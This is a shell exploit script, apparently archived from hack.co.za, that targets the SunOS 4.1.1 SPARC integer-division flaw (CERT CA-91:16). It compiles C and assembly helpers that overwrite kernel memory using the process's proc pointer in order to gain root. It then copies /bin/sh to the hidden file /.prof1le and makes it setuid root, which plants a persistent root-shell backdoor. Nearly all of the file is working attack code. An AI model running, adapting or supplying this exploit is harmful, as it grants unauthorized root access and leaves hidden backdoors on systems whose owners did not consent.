home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- #
- #**************************************************************************
- # HACK: Exploit floating point problems in SunOS 4.1.1
- # CERT: CA-91:16.SunOS.SPARC.Integer_Division.vulnerability 09/18/91
- # System: Sun OS 4.1.1 (? 4.1.2)
- #**************************************************************************
-
-
- PID=$$
- TMPDIR=/tmp/.tmp$PID
- SUIDSH=/.prof1le
-
- mkdir $TMPDIR
- cd $TMPDIR
-
- cat > mulc.c <<EOF
- main(argc,argv) char *argv[];{
- wrmem(strtol(argv[1],0,0), strtol(argv[2],0,0));
- }
- EOF
- cat > muls.s <<EOF
- .globl _wrmem
-
- _wrmem: mov %o0, %g2
- mov %o1, %g3
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- save %sp, -0x40, %sp
- mov %g2, %sp
- umul %g3, 1, %l0
- EOF
- cc -o mul mulc.c muls.s -ldl
-
-
- TMPFILE=$TMPDIR/PROCP$$
-
- # Find proc pointer.
- cat <<EOF | dc | tr 'A-Z' 'a-z' >$TMPFILE
- 16o 16i
- 4C `/etc/pstat -u $$ | grep procp | cut -f2 | tr 'a-z' 'A-Z'` + p
- EOF
- read PROCP <$TMPFILE
- SADR=`nm /vmunix | grep ' intstack' |cut -d' ' -f1`
- ./mul 0x${SADR} 0x10000
- ./mul 0x${PROCP} 0x${SADR}
- cp /bin/sh $SUIDSH; chmod 4755 $SUIDSH
- echo -n "Id = "
- whoami
- ( sleep 5; rm -rf $TMPDIR ) &
- cp /bin/sh $SUIDSH; chmod 4755 $SUIDSH
- # www.hack.co.za [2000]#
